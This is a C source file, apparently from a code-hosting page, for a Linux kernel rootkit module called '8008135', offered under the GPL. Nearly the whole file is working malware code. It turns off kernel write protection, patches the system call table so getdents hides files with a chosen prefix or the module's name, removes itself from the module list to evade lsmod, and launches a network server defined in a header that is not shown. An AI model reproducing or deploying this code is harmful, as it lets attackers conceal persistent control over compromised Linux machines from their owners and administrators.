151 lines
4.7 KiB
C
151 lines
4.7 KiB
C
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
|
|
/*
|
|
* main.c
|
|
* Copyright (C) 2019
|
|
*
|
|
* 8008135 is free software: you can redistribute it and/or modify it
|
|
* under the terms of the GNU General Public License as published by the
|
|
* Free Software Foundation, either version 3 of the License, or
|
|
* (at your option) any later version.
|
|
*
|
|
* 8008135 is distributed in the hope that it will be useful, but
|
|
* WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
|
* See the GNU General Public License for more details.
|
|
*
|
|
* You should have received a copy of the GNU General Public License along
|
|
* with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
*/
|
|
|
|
/**** includes *****************************************************************
|
|
*******************************************************************************/
|
|
#include "8008135.h"
|
|
#include "50ck3t.h"
|
|
/**** var ********************************************************************
|
|
*******************************************************************************/
|
|
|
|
sys_getdents_t sys_getdents_orig = NULL;
|
|
|
|
/*** FUNCTION ****************************************************************
|
|
* NAME: sys_getdents_new
|
|
* DESCRIPTION: function overriding the original getdents
|
|
* PARAMETERS: -
|
|
* RETURNS: -
|
|
*******************************************************************************/
|
|
asmlinkage long sys_getdents_new(unsigned int fd,
|
|
struct linux_dirent __user *dirent,
|
|
unsigned int count){
|
|
int boff;
|
|
struct linux_dirent* ent;
|
|
|
|
long ret = sys_getdents_orig(fd, dirent, count);
|
|
|
|
char* dbuf;
|
|
|
|
if (ret <= 0) {
|
|
return ret;
|
|
}
|
|
|
|
dbuf = (char*)dirent;
|
|
|
|
// go through the entries, looking for one that has our prefix
|
|
for (boff = 0; boff < ret;) {
|
|
|
|
ent = (struct linux_dirent*)(dbuf + boff);
|
|
|
|
// if it has hide prefix or module name anywhere, hide it
|
|
if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
|
|
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) {
|
|
#if defined DEBUG
|
|
printk("\n hide prefix or mod name contained!\n");
|
|
printk("\n ret %ld\n ", ret);
|
|
printk("\n dbuf %d\n" , dbuf);
|
|
printk("\n");
|
|
printk(ent->d_name);
|
|
#endif
|
|
// remove this entry by copying everything after it forward
|
|
// and adjust the length reported
|
|
#if defined DEBUG
|
|
printk("\n reclen %u \n", ent->d_reclen);
|
|
#endif
|
|
memcpy(dbuf + boff,
|
|
dbuf + boff + ent->d_reclen,
|
|
ret - (boff + ent->d_reclen));
|
|
ret -= ent->d_reclen;
|
|
#if defined DEBUG
|
|
printk("\n ret after change %ld\n ", ret);
|
|
#endif
|
|
} else {
|
|
// on to the next entry
|
|
boff += ent->d_reclen;
|
|
}
|
|
}
|
|
|
|
return ret;
|
|
}
|
|
|
|
|
|
/*** FUNCTION ****************************************************************
|
|
* NAME: hide_module
|
|
* DESCRIPTION: hides the module from lsmod
|
|
* PARAMETERS: -
|
|
* RETURNS:
|
|
*******************************************************************************/
|
|
void hide_module(void){
|
|
list_del(&THIS_MODULE->list);
|
|
}
|
|
|
|
|
|
/*** FUNCTION ****************************************************************
|
|
* NAME: 8008135_init
|
|
* DESCRIPTION: initializing Kernel Module
|
|
* PARAMETERS: -
|
|
* RETURNS: int
|
|
*******************************************************************************/
|
|
static int __init init_8008135(void) {
|
|
printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
|
|
|
|
// record the original getdents handler
|
|
sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM];
|
|
|
|
printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig);
|
|
|
|
// turn write protect off
|
|
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
|
|
|
|
// add our new handlers
|
|
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
|
|
|
|
// turn write protect back on
|
|
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
|
|
|
|
printk(KERN_INFO "New syscall in place\n");
|
|
network_server_init();
|
|
|
|
hide_module();
|
|
printk(KERN_INFO "Module hidden");
|
|
|
|
return 0;
|
|
}
|
|
|
|
/*** FUNCTION ****************************************************************
|
|
* NAME: 8008135_exit
|
|
* DESCRIPTION: unloading Kernel Module
|
|
* PARAMETERS: -
|
|
* RETURNS: -
|
|
*******************************************************************************/
|
|
static void __exit exit_8008135(void) {
|
|
network_server_exit();
|
|
// allow us to write to read onlu pages
|
|
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
|
|
// set getdents handler back
|
|
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
|
|
// turn write protect back on
|
|
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
|
|
printk(KERN_INFO "Old syscall back\n");
|
|
}
|
|
|
|
// Setting pointers to init-/exit-functions
|
|
module_init(init_8008135);
|
|
module_exit(exit_8008135);
|